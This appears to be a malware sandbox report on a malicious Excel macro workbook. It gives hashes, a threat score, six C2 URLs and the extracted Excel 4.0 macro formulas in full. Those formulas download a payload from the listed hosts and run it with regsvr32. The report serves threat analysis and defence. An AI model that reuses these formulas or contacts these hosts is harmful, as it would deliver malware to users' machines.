General

  • Target

    e973601e88e5086fb02ec081bcdc4c660b006e277cfb2d3d38fe249fff6b51a7

  • Size

    40KB

  • MD5

    8554766a2935ba1537f9c6abf54e8125

  • SHA1

    e26e44a2a22255fdb909440e514485eec29a0841

  • SHA256

    e973601e88e5086fb02ec081bcdc4c660b006e277cfb2d3d38fe249fff6b51a7

  • SHA512

    931f1b491811ed6ff130664abea6572427031be6aaaa9951fb19733f9574ced28cbc5a09e402ef1267af2e7a93ace747c1abbbb01e5fa3d0d3167513db41e2ad

  • SSDEEP

    768:0PnCsqi1O3mnHzyKfcrND59V+L9Rw4eWrXcTqy0Fy:qnC5iymTylND59V4jwmXc2XFy

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/

http://totalplaytuxtla.com/sitio/tEMOwWRh/

http://meca-global.com/wp-admin/zpM6L8KXY0H/

http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/

http://51.222.72.232/wp-includes/3ztqctcYr/

http://51.222.72.233/wp-includes/Xi60QX9khe/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/","..\xda.ocx",0,0) =IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/tEMOwWRh/","..\xda.ocx",0,0)) =IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/wp-admin/zpM6L8KXY0H/","..\xda.ocx",0,0)) =IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/","..\xda.ocx",0,0)) =IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.232/wp-includes/3ztqctcYr/","..\xda.ocx",0,0)) =IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.233/wp-includes/Xi60QX9khe/","..\xda.ocx",0,0)) =IF('EFEGVE'!F22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • e973601e88e5086fb02ec081bcdc4c660b006e277cfb2d3d38fe249fff6b51a7
    .xlsm office2007